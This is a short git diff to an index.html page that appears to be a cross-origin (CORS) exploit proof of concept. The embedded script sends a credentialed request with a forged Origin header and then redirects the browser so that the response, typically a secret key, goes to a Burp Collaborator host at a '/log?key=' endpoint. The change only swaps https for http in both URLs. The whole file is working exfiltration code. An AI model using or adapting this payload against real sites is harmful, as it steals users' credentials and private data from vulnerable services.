--- a/index.html
+++ b/index.html
@@ -3,14 +3,14 @@
 <script>
 var req = new XMLHttpRequest();
 req.onload = reqListener;
-req.open('GET','https://918iap92vpmod1m99bib03gx7odf14.burpcollaborator.net',true);
+req.open('GET','http://918iap92vpmod1m99bib03gx7odf14.burpcollaborator.net',true);
 req.withCredentials = true;
 req.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
 req.setRequestHeader("Origin", "johanrydbergmoller.github.io");
 req.send();
 
 function reqListener() {
-location='https://918iap92vpmod1m99bib03gx7odf14.burpcollaborator.net/log?key='+this.responseText;
+location='http://918iap92vpmod1m99bib03gx7odf14.burpcollaborator.net/log?key='+this.responseText;
 };
 </script>
 </body>
